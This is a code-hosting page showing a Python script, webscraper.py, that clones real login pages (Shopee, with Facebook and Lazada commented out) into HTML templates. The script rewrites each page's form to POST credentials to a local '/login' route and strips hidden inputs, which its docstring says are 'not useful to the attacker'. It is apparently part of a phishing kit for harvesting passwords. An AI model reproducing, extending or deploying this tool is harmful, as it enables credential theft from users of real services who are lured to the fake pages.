-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathwebscraper.py
More file actions
81 lines (61 loc) · 2.72 KB
/
webscraper.py
File metadata and controls
81 lines (61 loc) · 2.72 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
import requests
import locale
from bs4 import BeautifulSoup
import tld
import sys
locale.setlocale(locale.LC_ALL, 'de_GB')
def webScraping(url: str, login: bool = True) -> BeautifulSoup:
"""
Scape content, put into template and returns Beautified Soup
Login = True means this is the login page\n
Login = False means this is the failed login page.
"""
try:
website = requests.get(url, timeout=(27, 2))
if website.status_code != 200:
print(f"Error! Website is not visitable. Error code: {website.status_code}", file=sys.stderr)
domain = tld.get_tld(url, as_object=True).domain
if login == False:
domain = domain + "fail"
with open(f"templates/{domain}.html", "w", encoding="utf-8") as file:
soup = BeautifulSoup(website.text, "lxml")
soup = modifyPasswordForm(soup)
file.write(f"{soup.prettify()}")
return soup
except requests.exceptions.ConnectionError:
print(f"Website {url} might not exist!", file=sys.stderr)
def modifyPasswordForm(soup: BeautifulSoup):
"""
If it detects a form, add a "method='POST'" and "action='/login'" as part of the <form> attributes. It also removes all the hidden input as the hidden input is not useful to the attacker.
Note: THIS IS AN EXPERIMENTAL FEATURE
"""
password_input = soup.find_all("input", type="password")
if password_input == None:
print(f"Warning, password form is not found, this might NOT be a login page!", file=sys.stderr)
form = soup.find("form") # Deal with the ones which uses div and not form
if form != None:
form["action"] = "/login"
form["method"] = "POST"
# Remove hidden inputs
hidden_inputs = form.find_all("input", type="hidden")
for hidden_input in hidden_inputs:
hidden_input.decompose()
# Change login button if exist
login_button = form.find("button", {"name": ["login", "sign in"]})
if login_button != None:
del login_button["name"]
del login_button["value"]
# Remove scripts if the page can load with the form TODO: DECPRECATED METHOD SINCE SOME LOGIN FORM NEED SCRIPT TO LOAD
# scripts = soup.find_all("script")
# for script in scripts:
# script.decompose()
# div = soup.find("div", attrs={"display": "block"})
# div.decompose()
return soup
if __name__== "__main__" :
"""
Modify the url here. Anyways, this script is EXPERIMENTAL.
"""
#webScraping("https://facebook.com/login", False)
#webScraping("https://member.lazada.sg/user/login", False)
webScraping("https://shopee.sg/buyer/login", False)